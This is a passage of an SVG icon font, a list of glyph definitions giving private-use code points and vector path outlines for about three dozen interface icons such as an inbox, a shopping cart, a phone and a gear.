<glyph unicode="&#xe65b;" d="M376.086 369.010h-239.506l-93.83-102.36v-187.66h426.5v187.66l-93.164 102.36zM144.086 351.95h224.462l77.637-85.3h-130.475c0-31.946-27.764-57.752-59.71-57.752s-59.71 25.807-59.71 57.752h-130.39l78.186 85.3zM452.19 96.050h-392.38v153.54h121.528c8.163-32.654 39.051-57.752 74.662-57.752s66.499 25.099 74.662 57.752h121.528v-153.54z" />
<glyph unicode="&#xe65c;" d="M181.362 266.966l-12.062-12.062 86.7-86.7 86.7 86.7-12.062 12.062-66.108-66.108v270.036h-17.060v-270.036zM298.65 385.594v-17.060h110.89v-290.020h-307.080v290.020h110.89v17.060h-127.95v-324.14h341.2v324.14z" />
<glyph unicode="&#xe65d;" d="M486.31 415.925h-460.62v-17.060h34.12v-307.080h187.66v-42.65h-136.48v-17.060h290.020v17.060h-136.48v42.65h187.66v307.080h34.12v17.060zM435.13 108.845h-358.26v290.020h358.26v-290.020zM230.41 347.685h-102.36v-102.36h102.36v102.36zM213.35 262.385h-68.24v68.24h68.24v-68.24zM264.53 262.385h119.42v-17.060h-119.42v17.060zM264.53 347.685h119.42v-17.060h-119.42v17.060zM264.53 305.035h119.42v-17.060h-119.42v17.060zM128.050 211.205h255.9v-17.060h-255.9v17.060zM128.050 160.025h255.9v-17.060h-255.9v17.060z" />
<glyph unicode="&#xe65e;" d="M477.78 116.825v307.080h-443.56v-307.080h213.25v-32.996l-80.901-44.807 8.263-14.927 81.168 44.966 81.169-44.966 8.263 14.927-80.902 44.807v32.996h213.25zM51.28 406.845h409.44v-272.96h-409.44v272.96zM244.705 233.171l-50.589 70.556-33.853-65.641-53.229 107.408-38.86-143.435 16.46-4.466 27.097 100.003 48.231-97.312 36.536 70.84 54.621-76.171 47.173 158.272-16.344 4.881zM375.429 321.545c-28.222 0-51.189-22.958-51.189-51.18s22.966-51.18 51.189-51.18c28.214 0 51.171 22.958 51.171 51.18s-22.958 51.18-51.171 51.18zM375.429 236.245c-18.818 0-34.129 15.302-34.129 34.12s15.311 34.12 34.129 34.12c18.81 0 34.111-15.302 34.111-34.12s-15.302-34.12-34.111-34.12z" />
<glyph unicode="&#xe65f;" d="M375.42 428.72h-324.14v-409.44h409.44v324.14l-85.3 85.3zM341.3 411.66v-119.42h-170.6v119.42h170.6zM443.66 36.34h-375.32v375.32h85.3v-136.48h204.72v136.48h9.996l75.304-75.304v-300.016zM290.454 377.54h17.060v-51.18h-17.060v51.18zM170.7 155.76h170.6v-17.060h-170.6v17.060zM170.7 104.58h170.6v-17.060h-170.6v17.060z" />
<glyph unicode="&#xe660;" d="M51.28 428.72v-409.44h409.44v409.44h-409.44zM443.66 411.66v-76.77h-375.32v76.77h375.32zM68.34 36.34v281.49h375.32v-281.49h-375.32zM179.222 386.070h25.598v-25.59h-25.598v25.59zM307.18 386.070h25.59v-25.59h-25.59v25.59zM197.564 257.136c-3.057-20.759-12.928-21.117-32.795-21.833l-3.082-0.117v-14.469h33.662v-94.622h17.859v133.774h-15.244l-0.4-2.733zM298.267 216.928c-7.93 0-16.077-2.591-22.533-6.931l6.073 31.279h56.237v16.953h-69.548l-13.57-72.447h15.435l0.942 1.474c5.398 8.405 15.235 13.628 25.69 13.628 17.018 0 29.372-12.587 29.372-29.922 0-15.677-9.839-31.554-28.639-31.554-16.069 0-27.622 10.845-28.097 26.381l-0.1 3.099h-17.843l0.075-3.274c0.574-25.274 18.676-42.25 45.049-42.25 26.59 0 47.415 20.35 47.415 46.324-0.001 28.255-18.468 47.24-45.958 47.24z" />
<glyph unicode="&#xe661;" d="M452.19 437.208c-0.624 0-1.199-0.15-1.816-0.183h-49.364v0.183l-339.384-0.183c-0.617 0.033-1.192 0.183-1.816 0.183-18.843 0-34.12-15.277-34.12-34.12 0-9.479 3.873-18.043 10.112-24.223l75.188-75.188v5.573c0-77.203 60.385-140.145 136.48-144.577v-136.821h-68.24v-17.060h153.54v17.060h-68.24v136.821c76.095 4.431 136.48 67.373 136.48 144.577v-5.573l75.187 75.188c6.24 6.181 10.113 14.744 10.113 24.223 0 18.843-15.277 34.12-34.12 34.12zM110.99 327.801l-63.183 63.184c-3.258 3.232-5.057 7.53-5.057 12.103 0 9.171 7.272 16.677 16.361 17.043 0.525-0.067 1.049-0.116 1.591-0.142l0.467-0.025h49.822v-92.163zM383.95 309.25c0-70.556-57.403-127.95-127.95-127.95s-127.95 57.394-127.95 127.95v110.898h255.9v-110.898zM464.193 390.985l-63.183-63.184v92.164l50.289 0.025c0.542 0.026 1.066 0.075 1.591 0.142 9.089-0.366 16.361-7.871 16.361-17.043-0.001-4.574-1.8-8.872-5.058-12.104z" />
<glyph unicode="&#xe662;" d="M431.923 287.267h68.123l-247.311 146.426-240.781-146.426h61.709v-255.9h-34.12v-17.060h426.5v17.060h-34.12v255.9zM72.847 304.327l180.004 109.474 184.903-109.474h-364.907zM90.723 31.367v255.9h51.18v-255.9h-51.18zM158.963 31.367v255.9h51.18v-255.9h-51.18zM227.203 31.367v255.9h51.18v-255.9h-51.18zM295.443 31.367v255.9h51.18v-255.9h-51.18zM363.683 31.367v255.9h51.18v-255.9h-51.18z" />
<glyph unicode="&#xe663;" d="M401.010 87.587v276.933l31.055 30.946-12.045 12.078-30.105-30.004h-278.824v51.18h-17.060v-51.18h-51.281v-17.060h51.281v-289.953h289.919v-51.247h17.060v51.247h68.24v17.060h-68.24zM372.805 360.48l-261.714-260.874v260.874h261.714zM123.203 87.587l260.747 259.922v-259.923h-260.747z" />
<glyph unicode="&#xe664;" d="M460.72 377.54h-409.44c-14.127 0-25.59-11.463-25.59-25.59v-255.9c0-14.144 11.463-25.59 25.59-25.59h409.44c14.128 0 25.59 11.446 25.59 25.59v255.9c0 14.127-11.462 25.59-25.59 25.59zM42.75 309.3h426.5v-34.12h-426.5v34.12zM469.25 96.050c0-4.707-3.823-8.53-8.53-8.53h-409.44c-4.706 0-8.53 3.823-8.53 8.53v162.070h426.5v-162.070zM42.75 326.36v25.59c0 4.706 3.824 8.53 8.53 8.53h409.44c4.707 0 8.53-3.824 8.53-8.53v-25.59h-426.5zM76.87 138.7h170.6v-17.060h-170.6v17.060zM76.87 189.88h102.36v-17.060h-102.36v17.060zM383.7 121.64h34.637c9.271 0 16.793 7.397 16.793 16.543v1.024c0 9.138-7.522 16.552-16.793 16.552h-34.637c-9.287 0-16.81-7.414-16.81-16.552v-1.024c0-9.146 7.523-16.543 16.81-16.543z" />
<glyph unicode="&#xe665;" d="M445.523 361.835l-86.147 86.147h-189.523v-68.918h-103.376v-379.047h275.67v68.918h103.376v292.9zM359.376 423.618l61.784-61.783h-61.784v61.783zM83.706 17.247v344.588h155.065v-86.147h86.147v-258.441h-241.212zM256 354.7l61.784-61.783h-61.784v61.783zM342.147 86.165v206.753l-86.147 86.147h-68.918v51.688h155.065v-86.147h86.147v-258.441h-86.147z" />
<glyph unicode="&#xe666;" d="M281.59 420.19v-41.576l12.795-3.307c14.478-3.74 28.289-9.554 41.051-17.301l11.446-6.947 29.755 29.754 36.186-36.185-30.213-30.205 6.506-11.329c7.214-12.561 12.612-26.165 16.027-40.425l3.14-13.078h43.909v-51.18h-44.891l-3.457-12.52c-3.732-13.503-9.329-26.457-16.643-38.502l-6.948-11.454 32.571-32.562-36.186-36.185-33.029 33.021-11.32-6.506c-11.746-6.756-24.499-11.921-37.894-15.378l-12.804-3.299v-47.215h-51.18v47.215l-12.804 3.299c-13.395 3.457-26.148 8.622-37.894 15.378l-11.329 6.506-33.020-33.029-36.186 36.194 32.571 32.562-6.948 11.454c-7.314 12.045-12.911 24.999-16.643 38.502l-3.457 12.52h-44.891v51.18h43.909l3.14 13.078c3.415 14.26 8.813 27.864 16.027 40.425l6.506 11.329-30.213 30.205 36.186 36.185 29.755-29.754 11.446 6.947c12.762 7.747 26.573 13.562 41.051 17.301l12.795 3.307v41.575h51.178zM256 147.213c42.334 0 76.77 34.445 76.77 76.787 0 42.333-34.436 76.778-76.77 76.778s-76.77-34.445-76.77-76.778c0-42.342 34.436-76.787 76.77-76.787zM298.65 437.25h-85.3v-45.424c-16.294-4.207-31.605-10.721-45.632-19.234l-32.354 32.353-60.31-60.317 33.038-33.038c-7.972-13.877-13.995-28.964-17.827-44.94h-47.515v-85.3h48.964c4.216-15.253 10.479-29.597 18.502-42.817l-35.162-35.161 60.31-60.326 35.852 35.861c13.062-7.506 27.198-13.253 42.134-17.102v-51.055h85.3v51.055c14.936 3.849 29.072 9.596 42.134 17.102l35.853-35.852 60.31 60.317-35.162 35.161c8.022 13.22 14.286 27.565 18.502 42.817h48.964v85.3h-47.515c-3.832 15.977-9.855 31.063-17.827 44.94l33.038 33.038-60.31 60.317-32.354-32.353c-14.028 8.513-29.338 15.027-45.632 19.234v45.424h-0.001zM256 164.273c-32.987 0-59.71 26.74-59.71 59.727 0 32.986 26.723 59.718 59.71 59.718s59.71-26.731 59.71-59.718c0-32.987-26.723-59.727-59.71-59.727v0z" />
<glyph unicode="&#xe667;" d="M287.871 392.118c6.631 7.513 10.779 17.277 10.779 28.081 0 23.549-19.084 42.641-42.65 42.641-23.557 0-42.65-19.093-42.65-42.641 0-10.804 4.148-20.568 10.779-28.081-97.92-15.311-172.849-100.011-172.849-202.238 0-113.073 91.664-204.72 204.72-204.72s204.72 91.647 204.72 204.72c0 102.218-74.929 186.927-172.849 202.238zM256 445.78c14.111 0 25.59-11.479 25.59-25.581s-11.479-25.582-25.59-25.582-25.59 11.479-25.59 25.581 11.479 25.582 25.59 25.582zM256 2.22c-103.477 0-187.66 84.183-187.66 187.66s84.183 187.66 187.66 187.66 187.66-84.183 187.66-187.66-84.183-187.66-187.66-187.66zM153.682 87.387l138.804 65.741 65.75 138.812-139.263-65.299-65.291-139.254zM227.953 205.599l43.542-43.541-82.21-38.935 38.668 82.476zM283.556 174.119l-43.541 43.541 82.484 38.677-38.943-82.218z" />
<glyph unicode="&#xe668;" d="M426.625 402.876h-341.25c-18.843 0-34.12-15.277-34.12-34.12v-221.896c0-18.843 15.277-34.12 34.12-34.12h239.49l67.615-67.616v67.616h34.146c18.842 0 34.12 15.277 34.12 34.12v221.896c-0.001 18.843-15.279 34.12-34.121 34.12zM443.685 146.86c0-9.405-7.656-17.060-17.060-17.060h-51.205v-43.492l-43.491 43.492h-246.554c-9.404 0-17.060 7.655-17.060 17.060v221.896c0 9.405 7.656 17.060 17.060 17.060h341.25c9.404 0 17.060-7.655 17.060-17.060v-221.896zM256 274.81c-9.421 0-17.060-7.647-17.060-17.060 0-9.421 7.639-17.060 17.060-17.060s17.060 7.639 17.060 17.060c0 9.413-7.639 17.060-17.060 17.060zM324.24 274.81c-9.421 0-17.060-7.647-17.060-17.060 0-9.421 7.639-17.060 17.060-17.060s17.060 7.639 17.060 17.060c0 9.413-7.639 17.060-17.060 17.060zM189.367 274.81c-9.421 0-17.060-7.647-17.060-17.060 0-9.421 7.639-17.060 17.060-17.060s17.060 7.639 17.060 17.060c0 9.413-7.638 17.060-17.060 17.060z" />
<glyph unicode="&#xe669;" d="M383.517 164.29h68.673v136.48h-392.38v-127.95c0-89.507 72.563-162.070 162.070-162.070 86.625 0 157.181 68.023 161.637 153.54zM383.95 283.71h51.18v-102.36h-51.18v102.36zM221.88 27.81c-79.96 0-145.010 65.049-145.010 145.010v110.89h290.020v-110.89c0-79.961-65.050-145.010-145.010-145.010zM59.81-6.31h324.14v17.060h-324.14zM145.11 428.72h17.060v-76.77h-17.060v76.77zM281.59 428.72h17.060v-76.77h-17.060v76.77zM213.35 454.31h17.060v-102.36h-17.060v102.36z" />
<glyph unicode="&#xe66a;" d="M286.301 368.885c63.5 0 115.155-51.647 115.155-115.155 0-0.35-0.042-0.717-0.067-1.066-0.049-0.85-0.108-1.699-0.125-2.566l-0.433-17.41 17.435-0.067c42.2-0.117 76.528-34.553 76.528-76.754 0-42.084-34.262-76.52-76.37-76.737l-3.723-0.016h-312.27c-46.99 0.049-85.225 38.301-85.225 85.283 0 36.403 23.174 68.806 57.653 80.636l9.596 3.281 1.691 9.996c4.181 24.674 25.373 42.583 50.388 42.583 7.972 0 15.677-1.849 22.9-5.481l15.553-7.813 7.505 15.693c19.067 39.853 59.817 65.593 103.809 65.593zM286.301 385.945c-52.613 0-97.912-30.804-119.196-75.287-9.205 4.632-19.567 7.297-30.572 7.297-33.769 0-61.742-24.574-67.207-56.794-40.216-13.795-69.18-51.847-69.18-96.763 0-56.494 45.79-102.293 102.268-102.343l316.102 0.016c51.596 0.267 93.338 42.15 93.338 93.797 0 51.73-41.841 93.664-93.538 93.814 0.033 1.366 0.2 2.682 0.2 4.048 0 73.021-59.194 132.215-132.215 132.215v0z" />
<glyph unicode="&#xe66b;" d="M256 428.72c-113.056 0-204.72-91.664-204.72-204.72 0-113.057 91.664-204.72 204.72-204.72s204.72 91.663 204.72 204.72c0 113.056-91.664 204.72-204.72 204.72zM256 36.34c-103.477 0-187.66 84.183-187.66 187.66 0 103.476 84.183 187.66 187.66 187.66s187.66-84.184 187.66-187.66c0-103.477-84.183-187.66-187.66-187.66zM256 206.94h-102.36v-17.060h119.42v169.9h-17.060z" />
<glyph unicode="&#xe66c;" d="M256 437.25c-117.77 0-213.25-95.471-213.25-213.25s95.48-213.25 213.25-213.25c117.771 0 213.25 95.471 213.25 213.25s-95.479 213.25-213.25 213.25zM256 27.81c-108.183 0-196.19 88.015-196.19 196.19 0 108.174 88.007 196.19 196.19 196.19s196.19-88.016 196.19-196.19c0-108.175-88.007-196.19-196.19-196.19zM362.675 300.137l-136.938-132.79-47.973 47.964c-4.999 4.999-13.095 4.999-18.093 0-4.999-4.998-4.999-13.094 0-18.093l56.877-56.877c2.499-2.499 5.773-3.749 9.047-3.749 3.207 0 6.422 1.199 8.904 3.607l145.985 141.561c5.073 4.923 5.198 13.019 0.283 18.093-4.938 5.082-13.027 5.198-18.092 0.284z" />
<glyph unicode="&#xe66d;" d="M341.3 309.296v127.95h-298.55v-230.31h127.95v-127.95h177.015l68.24-68.231h10.645v68.231h42.65v230.31h-127.95zM59.81 223.996v196.19h264.43v-110.89h-153.54v-85.3h-110.89zM452.19 96.046h-42.65v-54.754l-54.762 54.754h-167.018v196.19h264.43v-196.19z" />
<glyph unicode="&#xe66e;" d="M489.946 326.36h-358.519l-28.946 119.42h-80.427v-17.060h67.015l83.176-343.091c-17.735-5.165-30.771-21.351-30.771-40.759 0-23.55 19.092-42.65 42.65-42.65 23.557 0 42.65 19.1 42.65 42.65 0 9.646-3.324 18.45-8.722 25.59h119.794c-5.398-7.14-8.713-15.944-8.713-25.59 0-23.55 19.084-42.65 42.641-42.65 23.566 0 42.659 19.1 42.659 42.65 0 23.565-19.093 42.641-42.65 42.65v0h-182.453l-8.272 34.12h239.489l69.399 204.72zM209.714 44.87c0-14.111-11.48-25.59-25.59-25.59s-25.59 11.479-25.59 25.59c0 14.11 11.479 25.59 25.59 25.59 14.11 0 25.59-11.48 25.59-25.59zM397.374 44.87c0-14.111-11.48-25.59-25.599-25.59-14.103 0-25.581 11.479-25.581 25.59s11.479 25.59 25.581 25.59c14.119 0 25.599-11.48 25.599-25.59zM176.926 138.7l-41.359 170.6h330.587l-57.834-170.6h-231.394z" />
<glyph unicode="&#xe66f;" d="M435.126 334.89h-70.556l-41.017 41.117c-0.049 0.049-0.091 0.083-0.133 0.133l-0.075 0.067c-6.164 6.097-14.627 9.863-23.982 9.863h-85.3c-9.913 0-18.751-4.282-24.99-11.029l-0.033 0.1-40.168-40.251h-72.006c-18.843 0-34.12-15.278-34.12-34.12v-204.72c0-18.843 15.277-34.12 34.12-34.12h358.26c18.851 0 34.129 15.277 34.129 34.12v204.72c-0.001 18.842-15.278 34.12-34.129 34.12zM452.194 96.050c0-9.397-7.664-17.060-17.069-17.060h-358.259c-9.404 0-17.060 7.663-17.060 17.060v204.72c0 9.413 7.656 17.060 17.060 17.060h79.077l25.656 25.706 0.417-1.25 19.584 21.176c3.315 3.582 7.738 5.548 12.461 5.548h85.3c4.506 0 8.771-1.75 12.112-5.048l46.015-46.132h77.637c9.404 0 17.069-7.647 17.069-17.060v-204.72zM255.996 317.83c-61.243 0-110.89-49.631-110.89-110.874s49.647-110.906 110.89-110.906 110.89 49.663 110.89 110.906-49.647 110.874-110.89 110.874zM255.996 113.11c-51.738 0-93.83 42.1-93.83 93.846 0 51.73 42.092 93.814 93.83 93.814s93.83-42.084 93.83-93.814c0-51.746-42.092-93.846-93.83-93.846zM255.996 283.71c-42.409 0-76.77-34.354-76.77-76.754s34.361-76.786 76.77-76.786 76.77 34.386 76.77 76.786-34.362 76.754-76.77 76.754zM255.996 147.23c-32.921 0-59.71 26.806-59.71 59.726s26.789 59.694 59.71 59.694 59.71-26.773 59.71-59.694-26.79-59.726-59.71-59.726z" />
<glyph unicode="&#xe670;" d="M374.511-6.31c-38.902 0-133.448 49.748-212.85 156.523-74.263 99.869-110.365 172.016-110.365 220.564 0 38.226 26.398 56.469 40.576 66.265l3.499 2.441c15.669 11.203 40.034 14.827 49.372 14.827 16.377 0 23.283-9.588 27.464-17.943 3.548-7.064 32.97-70.247 35.952-78.102 4.574-12.078 3.066-29.68-11.079-39.801l-2.482-1.733c-7.023-4.865-20.084-13.911-21.891-24.907-0.883-5.347 0.908-10.937 5.473-17.093 22.774-30.688 95.488-120.794 108.599-133.031 10.271-9.596 23.283-10.962 32.146-3.49 9.171 7.731 13.245 12.295 13.286 12.345l0.941 0.908c0.775 0.65 7.939 6.331 19.651 6.331 8.446 0 17.043-2.916 25.531-8.655 22.050-14.894 71.797-48.173 71.797-48.173l0.808-0.608c6.364-5.456 15.561-21.166 4.84-41.617-11.112-21.226-45.607-65.051-81.268-65.051zM144.743 437.25c-8.080 0-27.939-3.415-39.46-11.645l-3.707-2.591c-13.228-9.147-33.22-22.958-33.22-52.238 0-44.749 35.003-113.564 106.999-210.385 78.628-105.75 168.509-149.642 199.156-149.642 26.064 0 55.945 36.411 66.157 55.904 6.273 11.97 1.141 18.717-0.633 20.542-5.756 3.856-50.621 33.87-71.247 47.806-5.623 3.806-11.005 5.73-15.985 5.73-4.523 0-7.497-1.607-8.505-2.241-1.666-1.783-6.247-6.473-14.378-13.328-15.218-12.811-38.368-11.271-54.786 4.065-14.77 13.786-89.365 106.658-110.649 135.339-7.364 9.921-10.262 20.026-8.614 30.030 2.991 18.135 19.918 29.855 29.014 36.153l2.266 1.591c8.122 5.806 6.406 16.319 5.057 19.876-2.516 6.623-31.563 69.156-35.244 76.503-3.016 6.016-5.382 8.531-12.221 8.531z" />
<glyph unicode="&#xe671;" d="M136.58 317.83h238.84v68.24h-238.84v-68.24zM153.64 369.010h204.72v-34.12h-204.72v34.12zM375.42 428.72h-238.84c-18.843 0-34.12-15.277-34.12-34.12v-341.2c0-18.843 15.277-34.12 34.12-34.12h238.84c18.843 0 34.12 15.277 34.12 34.12v341.2c0 18.843-15.277 34.12-34.12 34.12zM392.48 53.4c0-9.413-7.655-17.060-17.060-17.060h-238.84c-9.404 0-17.060 7.647-17.060 17.060v341.2c0 9.397 7.656 17.060 17.060 17.060h238.84c9.405 0 17.060-7.663 17.060-17.060v-341.2zM153.64 241.060v51.18h-17.060v-68.24h68.24v17.060h-17.060zM153.64 155.76v51.18h-17.060v-68.24h68.24v17.060h-17.060zM153.64 70.46v51.18h-17.060v-68.24h68.24v17.060h-17.060zM238.94 241.060v51.18h-17.060v-68.24h68.24v17.060h-17.060zM324.24 241.060v51.18h-17.060v-68.24h68.24v17.060h-17.060zM238.94 155.76v51.18h-17.060v-68.24h68.24v17.060h-17.060zM238.94 70.46v51.18h-17.060v-68.24h68.24v17.060h-17.060zM324.24 70.46v136.48h-17.060v-153.54h68.24v17.060h-17.060z" />
<glyph unicode="&#xe672;" d="M42.746 437.25v-426.5h426.508v426.5h-426.508zM452.194 420.19v-68.24h-392.388v68.24h392.388zM59.806 27.81v307.080h392.388v-307.080h-392.388zM153.636 394.6h264.438v-17.060h-264.438v17.060zM85.396 394.6h17.060v-17.060h-17.060v17.060zM119.516 394.6h17.060v-17.060h-17.060v17.060z" />
<glyph unicode="&#xe673;" d="M477.93 383.592l-221.93 81.593-230.31-84.533v-314.278l230.31-83.559 230.31 83.559v314.144l-8.38 3.074zM247.47 4.065l-204.72 74.272v283.947l204.72-74.272v-283.947zM256 303.074l-197.222 71.554 197.222 72.381 197.040-72.447-197.040-71.488zM469.25 78.337l-204.72-74.272v283.948l204.72 73.971v-283.647z" />
<glyph unicode="&#xe674;" d="M460.72 415.925h-409.44v-110.89h17.069v-272.96h375.311v272.96h17.060v110.89zM426.6 49.135h-341.191v255.9h341.191v-255.9zM443.66 322.095h-375.32v76.77h375.32v-76.77zM194.299 194.071h123.818c17.627 0 31.93 13.886 31.93 31.030v6.181c0 17.143-14.303 31.030-31.93 31.030h-123.818c-17.635 0-31.913-13.887-31.913-31.030v-6.181c0.001-17.144 14.278-31.030 31.913-31.030zM179.447 231.281c0 7.705 6.664 13.97 14.853 13.97h123.818c8.197 0 14.87-6.264 14.87-13.97v-6.181c0-7.706-6.672-13.97-14.87-13.97h-123.819c-8.189 0-14.853 6.264-14.853 13.97v6.181z" />
<glyph unicode="&#xe675;" d="M435.155 420.248h-153.54c-10.262 0-19.359-4.623-25.606-11.804-6.264 7.181-15.361 11.804-25.623 11.804h-153.541c-18.843 0-34.12-15.277-34.12-34.12v-290.137c0-18.843 15.277-34.12 34.12-34.12h153.54c0.166 0 0.333 0.050 0.5 0.050 9.079-0.217 16.393-7.539 16.61-16.602v-17.568h17.060v9.463h0.167v7.689c0 9.221 7.363 16.718 16.527 17.010 0.116 0 0.25-0.042 0.366-0.042h153.54c18.843 0 34.12 15.277 34.12 34.12v290.137c0 18.843-15.278 34.12-34.12 34.12zM59.785 95.992v290.136c0 9.404 7.663 17.060 17.060 17.060h153.54c9.413 0 17.060-7.656 17.060-17.060v-290.137c0-9.404-7.647-17.060-17.060-17.060h-153.54c-9.396 0.001-17.060 7.656-17.060 17.061zM452.215 95.992c0-9.404-7.647-17.060-17.060-17.060h-153.54c-9.396 0-17.060 7.656-17.060 17.060v290.136c0 9.404 7.664 17.060 17.060 17.060h153.54c9.413 0 17.060-7.656 17.060-17.060v-290.136z" />
<glyph unicode="&#xe676;" d="M418.070 270.927c-11.795 0-23.040-2.283-33.445-6.264l-41.983 83.026h32.778v17.060h-60.518l17.252-34.12h-147.775l-8.614 17.060h29.055v17.060h-56.777l19.184-37.993c-0.1-0.142-0.233-0.258-0.316-0.408l-36.169-62.959c-11.313 4.84-23.749 7.539-36.811 7.539-51.738 0-93.83-42.092-93.83-93.839 0-51.738 42.092-93.83 93.83-93.83 48.856 0 89.074 37.552 93.398 85.3h69.831c3.040 0 5.847 1.616 7.38 4.249l78.769 135.755 26.015-51.446c-26.981-16.494-45.083-46.149-45.083-80.028 0-51.746 42.092-93.838 93.83-93.838s93.83 42.091 93.83 93.838-42.092 93.838-93.831 93.838zM176.39 308.604l62.101-122.986h-51.163c-2.632 29.047-18.526 54.296-41.584 69.631l30.646 53.355zM170.2 185.619h-64.466l31.496 54.821c17.968-12.329 30.438-32.088 32.97-54.821zM93.93 100.319c-42.334 0-76.77 34.436-76.77 76.77s34.436 76.779 76.77 76.779c9.972 0 19.468-1.966 28.215-5.44l-38.544-67.090c-1.516-2.641-1.508-5.889 0.017-8.521s4.339-4.257 7.38-4.257h79.202c-4.265-38.327-36.826-68.241-76.27-68.241zM255.109 190.559l-62.117 123.010h133.498l-71.381-123.010zM418.070 100.311c-42.334 0-76.77 34.444-76.77 76.778 0 27.231 14.295 51.139 35.737 64.775l36.119-71.439 15.227 7.697-36.011 71.222c8.047 2.875 16.677 4.523 25.698 4.523 42.334 0 76.77-34.445 76.77-76.779s-34.436-76.777-76.77-76.777z" />
<glyph unicode="&#xe677;" d="M401.177 138.004v137.089c0 71.388-51.664 130.599-119.587 142.644v10.896c0 9.421-7.647 17.060-17.060 17.060h-17.060c-9.429 0-17.060-7.639-17.060-17.060v-10.946c-67.79-12.178-119.253-71.322-119.253-142.594v-137.088l-59.877-48.465v-27.656h409.44v27.656l-59.543 48.464zM443.66 78.944h-375.32v2.457l59.877 48.464v145.228c0 70.556 57.394 127.95 127.95 127.95 70.539 0 127.95-57.394 127.95-127.95v-145.202l59.543-48.464v-2.483zM255.984 2.307c23.573 0 42.699 19.076 42.699 42.65h-85.366c0.017-23.574 19.126-42.65 42.667-42.65z" />
<glyph unicode="&#xe678;" d="M0.325 309.616v-171.225c0-13.961 11.321-25.281 25.274-25.281h213.566v221.78h-213.567c-13.952 0-25.273-11.312-25.273-25.274zM222.105 130.17h-196.507c-4.531 0-8.214 3.69-8.214 8.221v171.225c0 4.531 3.682 8.214 8.214 8.214h196.506v-187.66zM511.675 224c0 28.114-22.675 50.922-50.731 51.154v34.462c0 13.961-11.312 25.274-25.274 25.274h-179.445v-17.060h179.446c4.532 0 8.214-3.682 8.214-8.214v-171.225c0-4.531-3.682-8.221-8.214-8.221h-179.446v-17.060h179.446c13.962 0 25.274 11.32 25.274 25.281v34.454c28.056 0.233 50.73 23.032 50.73 51.155zM460.945 189.921v68.157c18.601-0.25 33.671-15.411 33.671-34.078-0.001-18.668-15.070-33.829-33.671-34.079z" />
<glyph unicode="&#xe679;" d="M255.983 437.25c-117.77 0-213.233-95.488-213.233-213.267 0-117.77 95.462-213.233 213.233-213.233s213.267 95.463 213.267 213.233c0 117.779-95.496 213.267-213.267 213.267zM451.973 232.513h-152.99c1.633 58.61 19.975 114.305 53.396 162.27 57.194-32.413 96.595-92.681 99.594-162.27zM255.983 420.19c28.822 0 56.162-6.298 80.835-17.493-34.57-50.397-53.462-108.824-55.062-170.184h-51.513c-1.616 61.36-20.492 119.795-55.079 170.184 24.674 11.204 52.014 17.493 80.819 17.493zM159.621 394.783c33.42-47.948 51.763-103.651 53.395-162.27h-152.989c2.982 69.589 42.4 129.866 99.594 162.27zM60.027 215.453h153.157c-1.633-58.652-19.942-114.405-53.38-162.353-57.295 32.379-96.779 92.697-99.777 162.353zM255.983 27.81c-28.805 0-56.144 6.289-80.818 17.493 34.587 50.38 53.463 108.774 55.079 170.15h51.513c1.6-61.392 20.492-119.77 55.062-170.15-24.675-11.195-52.014-17.493-80.836-17.493zM352.146 53.084c-33.421 47.948-51.713 103.701-53.33 162.369h153.157c-2.999-69.665-42.5-129.99-99.827-162.369z" />
<glyph unicode="&#xe67a;" d="M230.231 352.708v-69.99l16.894-0.166c117.354-1.133 183.462-53.33 200.68-159.105-64.467 74.571-138.805 74.605-200.506 74.622h-17.069v-69.39l-158.145 112.023 158.146 112.006zM247.291 385.712l-204.72-145.010 204.72-145.010v85.317c81.935-0.033 157.897-4.165 222.138-118.721 0 72.755-12.020 235.292-222.138 237.324v86.1z" />
<glyph unicode="&#xe67b;" d="M255.992 424.455l-230.302-400.91h460.62l-230.318 400.91zM255.992 390.202l200.846-349.597h-401.676l200.83 349.597zM247.462 262.385h17.060v-119.42h-17.060v119.42zM255.975 117.375c-7.064 0-12.77-5.73-12.77-12.795 0-7.047 5.707-12.778 12.77-12.778 7.089 0 12.82 5.731 12.82 12.778 0 7.065-5.73 12.795-12.82 12.795z" />
<glyph unicode="&#xe67c;" d="M480.383 87.57l-34.744 70.564-75.329-30.738 6.448-15.794 50.422 20.567c-23.216-67.906-85.958-117.52-160.762-121.061v307.323c33.646 4.206 59.71 32.853 59.71 67.648 0 37.686-30.563 68.231-68.248 68.231-37.677 0-68.232-30.546-68.232-68.231 0-34.795 26.065-63.45 59.71-67.648v-307.322c-74.154 3.515-136.471 52.28-160.162 119.278l46.048-18.784 6.448 15.794-75.329 30.738-34.746-70.565 15.31-7.53 24.415 49.581c25.5-78.761 99.404-135.931 186.544-135.931 85.417 0 158.222 54.879 185.095 131.216l22.091-44.866 15.311 7.53zM206.706 386.079c0 28.214 22.958 51.171 51.172 51.171 28.222 0 51.188-22.958 51.188-51.171 0-28.222-22.965-51.18-51.188-51.18-28.213 0-51.172 22.957-51.172 51.18z" />
<glyph unicode="&#xe67d;" d="M25.69 360.48v-341.2h460.62v341.2h-460.62zM469.25 36.34h-426.5v307.080h426.5v-307.080zM59.81 394.6h392.38v-17.060h-392.38v17.060zM93.93 428.72h324.14v-17.060h-324.14v17.060z" />
<glyph unicode="&#xe67e;" d="M255.875 386.053c-103.66 0-187.66-84.017-187.66-187.66 0-47.032 17.351-89.998 45.949-122.935l-43.9-53.812 13.211-10.779 42.542 52.13c33.712-32.338 79.444-52.246 129.858-52.246 50.53 0 96.362 20.009 130.107 52.496l42.517-52.447 13.261 10.746-43.932 54.195c28.455 32.904 45.707 75.754 45.707 122.652 0 103.643-84.034 187.66-187.66 187.66zM255.875 27.81c-94.072 0-170.6 76.52-170.6 170.583 0 94.080 76.528 170.6 170.6 170.6s170.6-76.52 170.6-170.6c0-94.063-76.528-170.583-170.6-170.583zM178.73 437.25h-50.68c-47.115 0-85.3-38.185-85.3-85.3v-51.33h24.257l111.723 112.356v24.274zM161.67 420.007l-101.86-102.327v34.27c0 37.618 30.613 68.24 68.24 68.24h33.62v-0.183zM383.95 437.25h-50.713v-24.274l111.74-112.356h24.274v51.33c-0.001 47.115-38.203 85.3-85.301 85.3zM452.19 317.68h-0.117l-101.776 102.327v0.183h33.653c37.627 0 68.24-30.622 68.24-68.24v-34.27zM247.47 198.41h-94.047v-17.060h111.107v153.54h-17.060z" />
<glyph unicode="&#xe67f;" d="M460.72 403.13h-409.44v-255.9h138.913l-87.733-102.36h307.080l-87.74 102.36h138.92v255.9zM139.554 61.93l116.438 135.856 116.454-135.856h-232.892zM443.66 164.29h-136.489l-51.18 59.71-51.18-59.71h-136.471v221.78h375.32v-221.78z" />
